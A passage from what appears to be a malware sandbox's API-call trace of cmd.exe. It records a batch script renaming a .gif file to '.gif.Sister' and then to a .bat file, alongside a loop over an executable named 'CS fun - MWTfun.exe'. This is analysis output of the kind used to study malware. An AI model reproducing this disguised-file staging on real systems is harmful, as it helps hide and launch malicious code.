MemoryPointer=0x21ed8d60480) returned 0x290 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60720 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60720, Size=0x30) returned 0x21ed8d60720 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60720) returned 0x30 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60760 [0143.355] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.359] GetProcessHeap () returned 0x21ed8c70000 [0143.359] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8690 [0143.359] ??_V@YAXPEAX@Z () returned 0x1 [0143.360] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.380] GetFullPathNameW (in: lpFileName="d_S3PO8QIc.gif", nBufferLength=0xffce, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif", lpFilePart=0xa6cf4fe1c8*="d_S3PO8QIc.gif") returned 0x26 [0143.380] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d439f0 [0143.381] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0143.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d439f0 [0143.381] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0143.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x800c6dd9, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x800c6dd9, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43270 [0143.381] FindClose (in: hFindFile=0x21ed8d43270 | out: hFindFile=0x21ed8d43270) returned 1 [0143.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301a1f60, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0xb6aa1d60, ftLastAccessTime.dwHighDateTime=0x1d5ee1a, ftLastWriteTime.dwLowDateTime=0xb6aa1d60, ftLastWriteTime.dwHighDateTime=0x1d5ee1a, nFileSizeHigh=0x0, nFileSizeLow=0x7af5, dwReserved0=0x4, dwReserved1=0x80, cFileName="d_S3PO8QIc.gif", cAlternateFileName="D_S3PO~1.GIF")) returned 0x21ed8d43810 [0143.382] FindClose (in: hFindFile=0x21ed8d43810 | out: hFindFile=0x21ed8d43810) returned 1 [0143.382] _wcsnicmp (_String1="D_S3PO~1.GIF", _String2="d_S3PO8QIc.gif", _MaxCount=0xe) returned 70 [0143.382] malloc (_Size=0x1ff9c) returned 0x21ed913fef0 [0143.382] ??_V@YAXPEAX@Z () returned 0x21ed913fef0 [0143.383] GetProcessHeap () returned 0x21ed8c70000 [0143.383] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8cdc120 [0143.383] ??_V@YAXPEAX@Z () returned 0x1 [0143.383] ??_V@YAXPEAX@Z () returned 0x1 [0143.385] GetProcessHeap () returned 0x21ed8c70000 [0143.385] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60760, Size=0x160) returned 0x21ed8d60760 [0143.385] GetProcessHeap () returned 0x21ed8c70000 [0143.385] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60760) returned 0x160 [0143.385] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0143.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.385] GetFileType (hFile=0x50) returned 0x2 [0143.385] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.385] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0143.395] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.395] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0143.406] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.406] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0143.418] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0143.418] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.418] GetFileType (hFile=0x50) returned 0x2 [0143.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.418] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0143.420] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.420] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0143.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.446] GetFileType (hFile=0x50) returned 0x2 [0143.446] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.446] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0143.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.449] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d602e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d602e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0143.450] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"d_S3PO8QIc.gif\" \"d_S3PO8QIc.gif.Sister\" ") returned 42 [0143.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.450] GetFileType (hFile=0x50) returned 0x2 [0143.450] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.450] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.454] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.454] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2a) returned 1 [0143.500] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0143.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.500] GetFileType (hFile=0x50) returned 0x2 [0143.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.500] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0143.503] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.503] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0143.512] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0143.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.512] GetFileType (hFile=0x50) returned 0x2 [0143.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.512] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.518] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0143.525] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0143.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.525] GetFileType (hFile=0x50) returned 0x2 [0143.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.525] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.528] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0143.530] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0143.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.530] GetFileType (hFile=0x50) returned 0x2 [0143.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.530] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.559] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0143.570] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.570] GetFileType (hFile=0x50) returned 0x2 [0143.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.570] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0143.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.574] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d60730*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d60730*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0143.576] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.bat\" ") returned 42 [0143.576] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.576] GetFileType (hFile=0x50) returned 0x2 [0143.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.576] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.580] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2a) returned 1 [0143.582] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0143.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.582] GetFileType (hFile=0x50) returned 0x2 [0143.582] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.582] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0143.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.584] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0143.592] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0143.593] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0143.594] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0143.594] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.596] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.596] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0143.596] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0143.596] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0143.596] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0143.596] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0143.596] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0143.596] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0143.596] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0143.596] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0143.596] ??_V@YAXPEAX@Z () returned 0x1 [0143.596] GetProcessHeap () returned 0x21ed8c70000 [0143.596] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb8) returned 0x21ed8d47210 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d47210, Size=0x64) returned 0x21ed92c1130 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92c1130) returned 0x64 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x6c) returned 0x21ed8d447c0 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb8) returned 0x21ed8d47090 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d47090, Size=0x64) returned 0x21ed8d44840 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44840) returned 0x64 [0143.597] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.597] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43150 [0143.597] GetProcessHeap () returned 0x21ed8c70000 [0143.597] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cb10 [0143.597] _wcsicmp (_String1="d_S3PO8QIc.gif", _String2=".") returned 54 [0143.597] _wcsicmp (_String1="d_S3PO8QIc.gif", _String2="..") returned 54 [0143.597] GetFileAttributesW (lpFileName="d_S3PO8QIc.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif")) returned 0x20 [0143.598] GetProcessHeap () returned 0x21ed8c70000 [0143.598] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93211e0 [0143.598] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93211f0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.598] SetErrorMode (uMode=0x0) returned 0x0 [0143.598] SetErrorMode (uMode=0x1) returned 0x0 [0143.598] GetFullPathNameW (in: lpFileName="d_S3PO8QIc.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif", lpFilePart=0xa6cf4fd660*="d_S3PO8QIc.gif") returned 0x26 [0143.599] SetErrorMode (uMode=0x0) returned 0x1 [0143.599] GetProcessHeap () returned 0x21ed8c70000 [0143.599] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5add0 [0143.599] _wcsicmp (_String1="d_S3PO8QIc.gif", _String2=".") returned 54 [0143.599] _wcsicmp (_String1="d_S3PO8QIc.gif", _String2="..") returned 54 [0143.599] GetFileAttributesW (lpFileName="d_S3PO8QIc.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif")) returned 0x20 [0143.599] ??_V@YAXPEAX@Z () returned 0x1 [0143.599] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.599] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.599] malloc (_Size=0xffce) returned 0x21ed912ff20 [0143.600] ??_V@YAXPEAX@Z () returned 0x21ed912ff20 [0143.600] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif")) returned 0x20 [0143.601] malloc (_Size=0xffce) returned 0x21ed913ff00 [0143.601] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0143.601] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5cb20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5cb20) returned 0x21ed8d438d0 [0143.602] malloc (_Size=0xffce) returned 0x21ed914fee0 [0143.602] ??_V@YAXPEAX@Z () returned 0x21ed914fee0 [0143.602] ??_V@YAXPEAX@Z () returned 0x1 [0143.602] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\d_S3PO8QIc.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\d_s3po8qic.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0143.603] FindNextFileW (in: hFindFile=0x21ed8d438d0, lpFindFileData=0x21ed8d5cb20 | out: lpFindFileData=0x21ed8d5cb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301a1f60, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0xb6aa1d60, ftLastAccessTime.dwHighDateTime=0x1d5ee1a, ftLastWriteTime.dwLowDateTime=0xb6aa1d60, ftLastWriteTime.dwHighDateTime=0x1d5ee1a, nFileSizeHigh=0x0, nFileSizeLow=0x7af5, dwReserved0=0x0, dwReserved1=0x0, cFileName="d_S3PO8QIc.gif", cAlternateFileName="")) returned 0 [0143.605] GetLastError () returned 0x12 [0143.605] FindClose (in: hFindFile=0x21ed8d438d0 | out: hFindFile=0x21ed8d438d0) returned 1 [0143.605] ??_V@YAXPEAX@Z () returned 0x1 [0143.606] ??_V@YAXPEAX@Z () returned 0x1 [0143.606] ??_V@YAXPEAX@Z () returned 0x1 [0143.608] ??_V@YAXPEAX@Z () returned 0x1 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43270 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c95920 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95920) returned 0x16 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d45440 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45440, Size=0xb2) returned 0x21ed8d45440 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45440) returned 0xb2 [0143.608] GetProcessHeap () returned 0x21ed8c70000 [0143.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d608d0 [0143.609] GetProcessHeap () returned 0x21ed8c70000 [0143.609] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d608d0, Size=0x30) returned 0x21ed8d608d0 [0143.609] GetProcessHeap () returned 0x21ed8c70000 [0143.609] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d608d0) returned 0x30 [0143.609] GetProcessHeap () returned 0x21ed8c70000 [0143.609] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60910 [0143.609] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.613] GetProcessHeap () returned 0x21ed8c70000 [0143.613] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47090 [0143.613] GetProcessHeap () returned 0x21ed8c70000 [0143.613] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d47a50 [0143.613] ??_V@YAXPEAX@Z () returned 0x1 [0143.615] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.619] GetProcessHeap () returned 0x21ed8c70000 [0143.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d48290 [0143.619] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0143.619] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d434b0 [0143.619] FindClose (in: hFindFile=0x21ed8d434b0 | out: hFindFile=0x21ed8d434b0) returned 1 [0143.619] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d437b0 [0143.619] FindClose (in: hFindFile=0x21ed8d437b0 | out: hFindFile=0x21ed8d437b0) returned 1 [0143.619] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8033f30a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8033f30a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d432d0 [0143.620] FindClose (in: hFindFile=0x21ed8d432d0 | out: hFindFile=0x21ed8d432d0) returned 1 [0143.620] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8033f30a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8033f30a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, 